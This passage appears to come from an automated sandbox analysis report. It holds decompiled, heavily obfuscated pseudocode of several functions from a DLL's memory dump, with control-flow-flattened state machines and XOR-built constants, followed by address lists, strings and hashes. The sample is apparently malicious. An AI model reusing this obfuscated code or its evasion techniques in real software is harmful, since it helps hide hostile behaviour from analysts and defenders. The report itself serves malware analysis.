				_v2768 = _v2768 ^ 0x2c50bf5e;
				_v2768 = _v2768 << 1;
				_v2768 = _v2768 ^ 0x086bcac7;
				_v2664 = 0x43880;
				_v2664 = _v2664 << 2;
				_v2664 = _v2664 ^ 0x001745f4;
				_v2776 = 0x99bfba;
				_v2776 = _v2776 + 0xb20b;
				_v2776 = _v2776 ^ 0x9325107f;
				_v2776 = _v2776 ^ 0x1bb55bce;
				_v2776 = _v2776 ^ 0x880f35ab;
				_v2784 = 0xcf6f67;
				_v2784 = _v2784 | 0xe7eb8da5;
				_t449 = 0x69;
				_v2784 = _v2784 * 5;
				_v2784 = _v2784 >> 0xc;
				_v2784 = _v2784 ^ 0x000ae4cd;
				_v2792 = 0x938e6a;
				_v2792 = _v2792 * 0x34;
				_v2792 = _v2792 + 0xd82d;
				_v2792 = _v2792 + 0xffff3001;
				_v2792 = _v2792 ^ 0x1dfcfd52;
				_v2640 = 0x59feb;
				_v2640 = _v2640 + 0xffffbab8;
				_v2640 = _v2640 ^ 0x000de14c;
				_v2760 = 0x4f2f51;
				_v2760 = _v2760 << 3;
				_v2760 = _v2760 | 0xca7d0b31;
				_v2760 = _v2760 >> 5;
				_v2760 = _v2760 ^ 0x06504f0f;
				_v2648 = 0x12de1c;
				_v2648 = _v2648 << 2;
				_v2648 = _v2648 ^ 0x0044c65b;
				_v2656 = 0xedb7d1;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x00060f5a;
				_v2624 = 0x25ed17;
				_v2624 = _v2624 << 8;
				_v2624 = _v2624 ^ 0x25e602f4;
				_v2632 = 0xdb105d;
				_v2632 = _v2632 + 0xbf07;
				_v2632 = _v2632 ^ 0x00d56ea2;
				_v2752 = 0xdb9922;
				_v2752 = _v2752 + 0xffff5c98;
				_t422 = _v2752 / _t449;
				_v2752 = _t422;
				_v2752 = _v2752 + 0xe0a7;
				_v2752 = _v2752 ^ 0x000f564b;
				_v2748 = 0x373105;
				_v2748 = _v2748 + 0xffff8875;
				_v2748 = _v2748 | 0xab9c3c2b;
				_v2748 = _v2748 ^ 0xabbdde7d;
				while(_t488 != 0x219adc7) {
					if(_t488 == 0x472b880) {
						E00D31A34(_v2672,  &_v1040, _t449, _t449, _v2680, _v2720, _v2728, _t449, _v2736, _v2764);
						_push(_v2712);
						_push(_v2772);
						_push(_v2704);
						E00D52D0A(_v2664, __eflags,  &_v2080, _v2776, _v2784, _v2792, 0xd3192c,  &_v520,  &_v1040, E00D4E1F8(0xd3192c, _v2696, __eflags));
						E00D4FECB(_t424, _v2640, _v2760, _v2648, _v2656);
						__eflags = 0;
						return E00D485FF(_v2624, _v2632, 0, 0,  &_v520, 0, _v2752, 0, _v2748);
					}
					_t500 = _t488 - 0x6430241;
					if(_t488 != 0x6430241) {
						L7:
						__eflags = _t488 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t422;
						}
						L10:
						return _t422;
					}
					E00D50DB1(_v2788,  &_v2600, _t500, _v2660, _t449, _v2688);
					 *((short*)(E00D409DD(_v2700,  &_v2600, _v2676, _v2740))) = 0;
					E00D3BAA9(_v2612, _v2668, _t500, _v2756, _v2628,  &_v1560);
					_push(_v2684);
					_push(_v2732);
					_push(_v2620);
					E00D52D0A(_v2608, _t500,  &_v1560, _v2644, _v2604, _v2652, 0xd3188c,  &_v2080,  &_v2600, E00D4E1F8(0xd3188c, _v2780, _t500));
					E00D4FECB(_t436, _v2616, _v2692, _v2724, _v2636);
					_t449 = _v2744;
					_t422 = E00D3BFBE( &_v2080, _t487, _v2716);
					_t492 =  &(_t492[0x18]);
					if(_t422 != 0) {
						_t488 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t488 = 0x6430241;
				goto L7;
			}

0x00d4a474
0x00d4a47e
0x00d4a480
0x00d4a48a
0x00d4a492
0x00d4a497
0x00d4a49f
0x00d4a4a7
0x00d4a4af
0x00d4a4b4
0x00d4a4bc
0x00d4a4c4
0x00d4a4cf
0x00d4a4d7
0x00d4a4e2
0x00d4a4ea
0x00d4a4ef
0x00d4a4f7
0x00d4a4ff
0x00d4a507
0x00d4a50b
0x00d4a513
0x00d4a51b
0x00d4a526
0x00d4a52e
0x00d4a539
0x00d4a541
0x00d4a546
0x00d4a54a
0x00d4a552
0x00d4a55d
0x00d4a568
0x00d4a573
0x00d4a586
0x00d4a58d
0x00d4a598
0x00d4a59d
0x00d4a5a5
0x00d4a5aa
0x00d4a5b9
0x00d4a5bc
0x00d4a5c0
0x00d4a5c8
0x00d4a5d3
0x00d4a5de
0x00d4a5e9
0x00d4a5f1
0x00d4a5f9
0x00d4a5fe
0x00d4a603
0x00d4a60b
0x00d4a616
0x00d4a621
0x00d4a62c
0x00d4a634
0x00d4a639
0x00d4a641
0x00d4a649
0x00d4a65f
0x00d4a666
0x00d4a671
0x00d4a67d
0x00d4a680
0x00d4a684
0x00d4a68c
0x00d4a694
0x00d4a6a7
0x00d4a6ae
0x00d4a6bb
0x00d4a6c6
0x00d4a6d1
0x00d4a6dc
0x00d4a6e7
0x00d4a6ef
0x00d4a6fa
0x00d4a705
0x00d4a710
0x00d4a71b
0x00d4a726
0x00d4a731
0x00d4a73c
0x00d4a74b
0x00d4a74e
0x00d4a757
0x00d4a75b
0x00d4a763
0x00d4a770
0x00d4a774
0x00d4a77c
0x00d4a784
0x00d4a78f
0x00d4a79a
0x00d4a7a5
0x00d4a7ad
0x00d4a7b5
0x00d4a7ba
0x00d4a7c2
0x00d4a7ca
0x00d4a7d2
0x00d4a7da
0x00d4a7e2
0x00d4a7f8
0x00d4a7ff
0x00d4a80a
0x00d4a815
0x00d4a81d
0x00d4a828
0x00d4a834
0x00d4a839
0x00d4a843
0x00d4a846
0x00d4a84a
0x00d4a852
0x00d4a85a
0x00d4a862
0x00d4a867
0x00d4a86f
0x00d4a877
0x00d4a87f
0x00d4a887
0x00d4a88c
0x00d4a894
0x00d4a89c
0x00d4a8a1
0x00d4a8a9
0x00d4a8b1
0x00d4a8b9
0x00d4a8be
0x00d4a8c3
0x00d4a8cb
0x00d4a8d8
0x00d4a8e1
0x00d4a8e7
0x00d4a8f4
0x00d4a901
0x00d4a909
0x00d4a90e
0x00d4a913
0x00d4a91b
0x00d4a923
0x00d4a92b
0x00d4a933
0x00d4a937
0x00d4a93f
0x00d4a94a
0x00d4a952
0x00d4a95d
0x00d4a965
0x00d4a96d
0x00d4a975
0x00d4a97d
0x00d4a985
0x00d4a98d
0x00d4a99c
0x00d4a99d
0x00d4a9a1
0x00d4a9a6
0x00d4a9ae
0x00d4a9bb
0x00d4a9bf
0x00d4a9c7
0x00d4a9cf
0x00d4a9d7
0x00d4a9e2
0x00d4a9ed
0x00d4a9f8
0x00d4aa00
0x00d4aa05
0x00d4aa0d
0x00d4aa12
0x00d4aa1a
0x00d4aa25
0x00d4aa2d
0x00d4aa38
0x00d4aa43
0x00d4aa4b
0x00d4aa56
0x00d4aa61
0x00d4aa69
0x00d4aa74
0x00d4aa7f
0x00d4aa8a
0x00d4aa95
0x00d4aa9d
0x00d4aaa9
0x00d4aaab
0x00d4aaaf
0x00d4aab7
0x00d4aabf
0x00d4aac7
0x00d4aacf
0x00d4aad7
0x00d4aadf
0x00d4aaed
0x00d4ac4c
0x00d4ac51
0x00d4ac5d
0x00d4ac61
0x00d4acaa
0x00d4acca
0x00d4acd9
0x00000000
0x00d4acfa
0x00d4aaf3
0x00d4aaf5
0x00d4ac13
0x00d4ac13
0x00d4ac19
0x00000000
0x00000000
0x00000000
0x00000000
0x00d4ad07
0x00d4ad07
0x00d4ad07
0x00d4ab12
0x00d4ab37
0x00d4ab5b
0x00d4ab60
0x00d4ab6c
0x00d4ab70
0x00d4abc2
0x00d4abe2
0x00d4abee
0x00d4abfa
0x00d4abff
0x00d4ac04
0x00d4ac0a
0x00000000
0x00d4ac0a
0x00000000
0x00d4ac04
0x00d4ac11
0x00000000

Strings

3k, xrefs: 00D4A7D2
Q/O, xrefs: 00D4A9F8
$P, xrefs: 00D4A47C
L, xrefs: 00D4A9ED
p(}, xrefs: 00D4A731
%Z, xrefs: 00D4A694
.5, xrefs: 00D4A877
.7Y, xrefs: 00D4A684
+f%, xrefs: 00D4A86F
n,, xrefs: 00D4A4FF
h, xrefs: 00D4A852
spC, xrefs: 00D4A4E2

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$%Z$+f%$.5$.7Y$L$Q/O$h$p(}$spC$3k$n,
API String ID: 0-500290626
Opcode ID: 703d3be78635114d7b4e2f9817d4a336407b4bd0acf1305019185604f27b559c
Instruction ID: 5aa1ad4c1764df0a0249975c4fdf4712284a8ad39ae5cd9d41aebe5167f35bd7
Opcode Fuzzy Hash: 703d3be78635114d7b4e2f9817d4a336407b4bd0acf1305019185604f27b559c
Instruction Fuzzy Hash: AC12F1714093809FD3A9CF60C98AA8BFBE1FBC4348F108A1DE1DA96260D7B58549CF57

Uniqueness

Uniqueness Score: -1.00%

Function 00D4D1BC, Relevance: 15.3, Strings: 12, Instructions: 347
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00D4D1BC(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v268;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				intOrPtr _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				void* _t309;
				void* _t322;
				intOrPtr _t325;
				intOrPtr _t328;
				intOrPtr _t332;
				void* _t336;
				intOrPtr _t338;
				intOrPtr _t340;
				intOrPtr _t341;
				void* _t343;
				intOrPtr _t346;
				void* _t349;
				intOrPtr _t364;
				intOrPtr _t365;
				void* _t382;
				intOrPtr _t385;
				void* _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				intOrPtr _t394;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t399;

				_push(_a24);
				_t395 = __edx;
				_push(_a20);
				_v288 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00D4FE29(__ecx);
				_v312 = 0xeda4ef;
				_t397 = _t396 + 0x20;
				_v312 = _v312 + 0x7c87;
				_v312 = _v312 ^ 0x00e6bc42;
				_t346 = 0;
				_v356 = 0x83a7cc;
				_t349 = 0x902256d;
				_v356 = _v356 << 0xd;
				_v356 = _v356 | 0xd496e6a5;
				_v356 = _v356 ^ 0xf4f8676c;
				_v388 = 0x254bab;
				_v388 = _v388 | 0x2708e00f;
				_v388 = _v388 << 0xc;
				_v388 = _v388 << 0xa;
				_v388 = _v388 ^ 0xebca5aa3;
				_v376 = 0x3a43eb;
				_v376 = _v376 + 0x5e30;
				_v376 = _v376 ^ 0x2d5dec97;
				_v376 = _v376 ^ 0x2d6492cf;
				_v324 = 0x965e68;
				_v324 = _v324 ^ 0x4fad172c;
				_v324 = _v324 ^ 0x4f30eea0;
				_v404 = 0x95ea8f;
				_t391 = 0x3c;
				_v404 = _v404 / _t391;
				_v404 = _v404 << 0xc;
				_v404 = _v404 | 0x93230375;
				_v404 = _v404 ^ 0xb7f3bbc9;
				_v296 = 0x950835;
				_v296 = _v296 + 0xffff217e;
				_v296 = _v296 ^ 0x0090010d;
				_v412 = 0x146e3b;
				_v412 = _v412 ^ 0xfee339d3;
				_v412 = _v412 | 0x08dab50c;
				_v412 = _v412 << 5;
				_v412 = _v412 ^ 0xdff21b2d;
				_v316 = 0x73cd3;
				_v316 = _v316 << 0xb;
				_v316 = _v316 ^ 0x39e53ce3;
				_v304 = 0x17d1c9;
				_v304 = _v304 | 0x32076b61;
				_v304 = _v304 ^ 0x32193df4;
				_v400 = 0xe22ffc;
				_v400 = _v400 * 0xf;
				_v400 = _v400 << 8;
				_v400 = _v400 >> 5;
				_v400 = _v400 ^ 0x020db90e;
				_v360 = 0x4e823d;
				_v360 = _v360 >> 7;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0x000f4c82;
				_v332 = 0x37cdc;
				_v332 = _v332 >> 0xe;
				_v332 = _v332 ^ 0x000cfe6d;
				_v392 = 0x36521e;
				_v392 = _v392 << 2;
				_v392 = _v392 ^ 0x01f25d84;
				_v392 = _v392 + 0xffff6602;
				_v392 = _v392 ^ 0x0122fac3;
				_v292 = 0x811559;
				_v292 = _v292 ^ 0x63e4ed2d;
				_v292 = _v292 ^ 0x636b0aa2;
				_v408 = 0xc9a98b;
				_v408 = _v408 ^ 0x273a7ab7;
				_t392 = 0x3d;
				_v408 = _v408 / _t392;
				_v408 = _v408 | 0xd16a0a28;
				_v408 = _v408 ^ 0xd1e35630;
				_v352 = 0x4de238;
				_v352 = _v352 ^ 0xe481f79a;
				_v352 = _v352 ^ 0xe4c0c54b;
				_v340 = 0x7e756a;
				_v340 = _v340 << 0xb;
				_v340 = _v340 ^ 0xf3ae0159;
				_v384 = 0x3029be;
				_v384 = _v384 + 0x835e;
				_v384 = _v384 ^ 0x9e5eea44;
				_v384 = _v384 ^ 0x9e65521f;
				_v364 = 0xcf8251;
				_v364 = _v364 + 0xffff400c;
				_t393 = 0x78;
				_v364 = _v364 * 0x5a;
				_v364 = _v364 ^ 0x48b0c21e;
				_v320 = 0x2b8f03;
				_v320 = _v320 << 7;
				_v320 = _v320 ^ 0x15cafa02;
				_v372 = 0xb0a86a;
				_v372 = _v372 ^ 0x35b8bfe6;
				_v372 = _v372 ^ 0xed8d6bf1;
				_v372 = _v372 ^ 0xd88344ec;
				_v344 = 0x8c38;
				_v344 = _v344 ^ 0x1ac013b0;
				_v344 = _v344 ^ 0x1ac5368a;
				_v348 = 0x2c1ac3;
				_v348 = _v348 >> 6;
				_v348 = _v348 ^ 0x0005c30d;
				_v300 = 0x3ae4ba;
				_v300 = _v300 >> 0xe;
				_v300 = _v300 ^ 0x00012364;
				_v396 = 0xe1901;
				_v396 = _v396 << 0xe;
				_v396 = _v396 + 0x39a8;
				_v396 = _v396 ^ 0x864e7189;
				_v368 = 0xe5c11e;
				_t394 = _v288;
				_v368 = _v368 / _t393;
				_v368 = _v368 | 0x7320cec6;
				_v368 = _v368 ^ 0x73273aba;
				_v336 = 0xf33546;
				_v336 = _v336 ^ 0x37961faf;
				_v336 = _v336 ^ 0x37663e0b;
				_v328 = 0x922129;
				_v328 = _v328 | 0xf90cd049;
				_v328 = _v328 ^ 0xf99851f2;
				_v416 = 0x9fd52c;
				_v416 = _v416 << 2;
				_v416 = _v416 * 0x22;
				_v416 = _v416 + 0xffff9e7e;
				_v416 = _v416 ^ 0x54e779e0;
				_v380 = 0x615361;
				_v380 = _v380 >> 1;
				_v380 = _v380 + 0x673e;
				_v380 = _v380 ^ 0x003e049c;
				_v308 = 0x9da5c1;
				_v308 = _v308 + 0xf72;
				_v308 = _v308 ^ 0x009db133;
				while(1) {
					L1:
					_t309 = 0xe35a561;
					do {
						while(1) {
							L2:
							_t399 = _t349 - 0x8816d6a;
							if(_t399 > 0) {
								break;
							}
							if(_t399 == 0) {
								_t325 =  *0xd56228; // 0x0
								_t328 =  *0xd56228; // 0x0
								_t332 =  *0xd56228; // 0x0
								_t336 = E00D467E6(_t394, _v400, _v360, _v332, _v392,  &_v268,  *( *((intOrPtr*)(_t332 + 4)) + 0x14) & 0x0000ffff, _v292,  &_v276,  *( *((intOrPtr*)(_t328 + 4)) + 0x44) & 0x0000ffff, _v408,  *((intOrPtr*)(_t325 + 4)) + 0x20, _v352,  &_v260);
								_t397 = _t397 + 0x30;
								if(_t336 == 0) {
									L25:
									_t349 = 0xc732dcb;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								} else {
									_t349 = 0x772d3d2;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								}
							} else {
								if(_t349 == 0x200f7b2) {
									if(_v280 >= _v308) {
										_t338 = E00D42E5D( &_v284,  &_v276);
									} else {
										_t338 = E00D380C0( &_v284);
									}
									_t394 = _t338;
									_t309 = 0xe35a561;
									_t349 =  !=  ? 0xe35a561 : 0xc732dcb;
									continue;
								} else {
									if(_t349 == 0x323c58a) {
										_t364 =  *0xd56228; // 0x0
										_t340 =  *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)) + 0x18));
										 *((intOrPtr*)(_t364 + 0x1c)) =  *((intOrPtr*)(_t364 + 0x1c)) + 1;
										_t385 =  *((intOrPtr*)(_t364 + 0x1c));
										 *((intOrPtr*)(_t364 + 4)) = _t340;
										if(_t340 == 0) {
											 *((intOrPtr*)(_t364 + 4)) =  *((intOrPtr*)(_t364 + 0x14));
										}
										_t341 =  *0xd56228; // 0x0
										if(_t385 >=  *((intOrPtr*)(_t341 + 0x18))) {
											_t365 =  *0xd56228; // 0x0
											 *(_t365 + 0x1c) =  *(_t365 + 0x1c) & 0x00000000;
										} else {
											_t349 = 0x902256d;
											while(1) {
												L1:
												_t309 = 0xe35a561;
												goto L2;
											}
										}
									} else {
										if(_t349 == 0x54cb160) {
											_t343 = E00D45779( &_v284, _t395, _v388, _v376, _v288);
											_t397 = _t397 + 0xc;
											if(_t343 != 0) {
												_t349 = 0x200f7b2;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										} else {
											if(_t349 != 0x772d3d2) {
												goto L35;
											} else {
												if(E00D36B7A(_v340, _a16, _v384,  &_v268) == 0) {
													_t390 = 0x323c58a;
												} else {
													_t390 = 0x72c7f38;
													_t346 = 1;
												}
												_t349 = 0x939e27d;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										}
									}
								}
							}
							L38:
							return _t346;
						}
						if(_t349 == 0x902256d) {
							_t394 = 0;
							E00D4FE2A(_v312, _v356, 0x100,  &_v260);
							_v276 = 0;
							_t349 = 0x54cb160;
							_v272 = 0;
							_v284 = 0;
							_v280 = 0;
							goto L34;
						} else {
							if(_t349 == 0x939e27d) {
								E00D52B09(_v364, _v268, _v320, _v372);
								goto L25;
							} else {
								if(_t349 == 0xc732dcb) {
									E00D52B09(_v344, _v284, _v348, _v300);
									E00D52B09(_v396, _t394, _v368, _v336);
									E00D52B09(_v328, _v276, _v416, _v380);
									_t397 = _t397 + 0x18;
									_t349 = _t390;
									L34:
									_t309 = 0xe35a561;
									goto L35;
								} else {
									if(_t349 != _t309) {
										goto L35;
									} else {
										_push(_t349);
										_push(_t349);
										_t322 = E00D4CCA0(1, 0x40);
										_push( &_v260);
										_push(_t322);
										_push(_v304);
										_t382 = 0xb;
										E00D3E404(_v316, _t382);
										_t397 = _t397 + 0x1c;
										_t349 = 0x8816d6a;
										goto L1;
									}
								}
							}
						}
						goto L38;
						L35:
					} while (_t349 != 0x72c7f38);
					goto L38;
				}
			}

0x00d4d1c6
0x00d4d1cd
0x00d4d1d1
0x00d4d1d8
0x00d4d1df
0x00d4d1e6
0x00d4d1ed
0x00d4d1f4
0x00d4d1fb
0x00d4d1fc
0x00d4d1fd
0x00d4d202
0x00d4d20d
0x00d4d210
0x00d4d21a
0x00d4d222
0x00d4d224
0x00d4d22c
0x00d4d231
0x00d4d236
0x00d4d23e
0x00d4d246
0x00d4d24e
0x00d4d256
0x00d4d25b
0x00d4d260
0x00d4d268
0x00d4d270
0x00d4d278
0x00d4d280
0x00d4d288
0x00d4d290
0x00d4d298
0x00d4d2a0
0x00d4d2ae
0x00d4d2b1
0x00d4d2b5
0x00d4d2ba
0x00d4d2c2
0x00d4d2ca
0x00d4d2d5
0x00d4d2e0
0x00d4d2eb
0x00d4d2f3
0x00d4d2fb
0x00d4d303
0x00d4d308
0x00d4d310
0x00d4d318
0x00d4d31d
0x00d4d325
0x00d4d330
0x00d4d33b
0x00d4d346
0x00d4d353
0x00d4d357
0x00d4d35c
0x00d4d361
0x00d4d369
0x00d4d371
0x00d4d376
0x00d4d37b
0x00d4d383
0x00d4d38b
0x00d4d390
0x00d4d398
0x00d4d3a0
0x00d4d3a5
0x00d4d3ad
0x00d4d3b5
0x00d4d3bd
0x00d4d3c8
0x00d4d3d5
0x00d4d3e0
0x00d4d3e8
0x00d4d3f6
0x00d4d3fb
0x00d4d401
0x00d4d409
0x00d4d411
0x00d4d419
0x00d4d421
0x00d4d429
0x00d4d431
0x00d4d436
0x00d4d43e
0x00d4d446
0x00d4d44e
0x00d4d456
0x00d4d45e
0x00d4d466
0x00d4d473
0x00d4d47b
0x00d4d47f
0x00d4d487
0x00d4d48f
0x00d4d494
0x00d4d49c
0x00d4d4a4
0x00d4d4ac
0x00d4d4b4
0x00d4d4bc
0x00d4d4c4
0x00d4d4cc
0x00d4d4d4
0x00d4d4dc
0x00d4d4e1
0x00d4d4e9
0x00d4d4f4
0x00d4d4fc
0x00d4d507
0x00d4d50f
0x00d4d51c
0x00d4d524
0x00d4d52c
0x00d4d53a
0x00d4d541
0x00d4d545
0x00d4d54d
0x00d4d555
0x00d4d55d
0x00d4d565
0x00d4d56d
0x00d4d575
0x00d4d57d
0x00d4d585
0x00d4d58d
0x00d4d597
0x00d4d59b
0x00d4d5a3
0x00d4d5ab
0x00d4d5b3
0x00d4d5b7
0x00d4d5bf
0x00d4d5c7
0x00d4d5d2
0x00d4d5dd
0x00d4d5e8
0x00d4d5e8
0x00d4d5e8
0x00d4d5ed
0x00d4d5ed
0x00d4d5ed
0x00d4d5ed
0x00d4d5f3
0x00000000
0x00000000
0x00d4d5f9
0x00d4d716
0x00d4d726
0x00d4d742
0x00d4d76a
0x00d4d76f
0x00d4d774
0x00d4d785
0x00d4d785
0x00d4d5e8
0x00d4d5e8
0x00d4d5e8
0x00000000
0x00d4d5e8
0x00d4d776
0x00d4d776
0x00d4d5e8
0x00d4d5e8
0x00d4d5e8
0x00000000
0x00d4d5e8
0x00d4d5e8
0x00d4d5ff
0x00d4d605
0x00d4d6dd
0x00d4d6ed
0x00d4d6df
0x00d4d6df
0x00d4d6df
0x00d4d6f2
0x00d4d6fb
0x00d4d700
0x00000000
0x00d4d60b
0x00d4d611
0x00d4d691
0x00d4d69a
0x00d4d69d
0x00d4d6a0
0x00d4d6a3
0x00d4d6a8
0x00d4d6ad
0x00d4d6ad
0x00d4d6b0
0x00d4d6b8
0x00d4d8c4
0x00d4d8ca
0x00d4d6be
0x00d4d6be
0x00d4d5e8
0x00d4d5e8
0x00d4d5e8
0x00000000
0x00d4d5e8
0x00d4d5e8
0x00d4d613
0x00d4d619
0x00d4d677
0x00d4d67c
0x00d4d681
0x00d4d687
0x00d4d5e8
0x00d4d5e8
0x00d4d5e8
0x00000000
0x00d4d5e8
0x00d4d5e8
0x00d4d61b
0x00d4d621
0x00000000
0x00d4d627
0x00d4d647
0x00d4d653
0x00d4d649
0x00d4d64b
0x00d4d650
0x00d4d650
0x00d4d658
0x00d4d5e8
0x00d4d5e8
0x00d4d5e8
0x00000000
0x00d4d5e8
0x00d4d5e8
0x00d4d621
0x00d4d619
0x00d4d611
0x00d4d605
0x00d4d8d1
0x00d4d8da
0x00d4d8da
0x00d4d795
0x00d4d87f
0x00d4d887
0x00d4d890
0x00d4d897
0x00d4d89c
0x00d4d8a3
0x00d4d8aa
0x00000000
0x00d4d79b
0x00d4d7a1
0x00d4d864
0x00000000
0x00d4d7a7
0x00d4d7ad
0x00d4d817
0x00d4d82a
0x00d4d845
0x00d4d84a
0x00d4d84d
0x00d4d8b1
0x00d4d8b1
0x00000000
0x00d4d7af
0x00d4d7b1
0x00000000
0x00d4d7b7
0x00d4d7ca
0x00d4d7cb
0x00d4d7d0
0x00d4d7dc
0x00d4d7dd
0x00d4d7de
0x00d4d7ee
0x00d4d7ef
0x00d4d7f4
0x00d4d7f7
0x00000000
0x00d4d7f7
0x00d4d7b1
0x00d4d7ad
0x00d4d7a1
0x00000000
0x00d4d8b6
0x00d4d8b6
0x00000000
0x00d4d8c2

Strings

C:, xrefs: 00D4D268
0^, xrefs: 00D4D270
yT, xrefs: 00D4D5A3
}9, xrefs: 00D4D658
ju~, xrefs: 00D4D429
yT, xrefs: 00D4D592
<9, xrefs: 00D4D31D
>g, xrefs: 00D4D5B7
aSa, xrefs: 00D4D5AB
8M, xrefs: 00D4D411
}9, xrefs: 00D4D79B
-c, xrefs: 00D4D3C8

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -c$0^$8M$>g$aSa$ju~$}9$}9$<9$C:$yT$yT
API String ID: 0-111235429
Opcode ID: 7f51079882fc0043c8c461943041d96ec1b3abd1ffe81ec5c7abc97823502865
Instruction ID: 75ef86c3b251c03b92154c2cae1d2690777ff5c252941bb9756c73e3ce92632e
Opcode Fuzzy Hash: 7f51079882fc0043c8c461943041d96ec1b3abd1ffe81ec5c7abc97823502865
Instruction Fuzzy Hash: C90220711083809FD369CF25C48AA6BBBE1FB84348F50891DF6DA86261C7B1C949CF63

Uniqueness

Uniqueness Score: -1.00%

Function 00D357B8, Relevance: 14.4, Strings: 11, Instructions: 616
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00D357B8(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				void _v12;
				void _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				void* _t657;
				intOrPtr _t715;
				void* _t716;
				void* _t717;
				void* _t725;
				void* _t729;
				void* _t737;
				void* _t740;
				intOrPtr _t746;
				void* _t798;
				void* _t814;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				void* _t829;
				void* _t832;
				void* _t833;
				void* _t834;
				void* _t840;

				_push(_a24);
				_t746 = __edx;
				_push(_a20);
				_v224 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0x20);
				E00D4FE29(_t657);
				_v108 = 0x7f0a1;
				_t834 = _t833 + 0x20;
				_t832 = 0;
				_t740 = 0xa8b367c;
				_t816 = 0x72;
				_v108 = _v108 / _t816;
				_v108 = _v108 ^ 0x000011d4;
				_v220 = 0x3ea28;
				_v220 = _v220 | 0x6e60dce4;
				_v220 = _v220 << 0xd;
				_v220 = _v220 ^ 0x7fdd8000;
				_v272 = 0xf906dc;
				_v272 = _v272 + 0x5e9;
				_t817 = 0x7a;
				_v272 = _v272 * 0x15;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0x70614800;
				_v264 = 0x600b37;
				_v264 = _v264 / _t817;
				_v264 = _v264 ^ 0x262493f0;
				_t818 = 0x3e;
				_v264 = _v264 * 0x11;
				_v264 = _v264 ^ 0x886a01f8;
				_v260 = 0xf3d497;
				_v260 = _v260 / _t818;
				_v260 = _v260 >> 6;
				_v260 = _v260 >> 3;
				_v260 = _v260 ^ 0x000001f7;
				_v156 = 0x8d2235;
				_v156 = _v156 >> 0xe;
				_t819 = 0xe;
				_v156 = _v156 * 0x5b;
				_v156 = _v156 ^ 0x0000c87c;
				_v292 = 0xf4d;
				_v292 = _v292 + 0x4732;
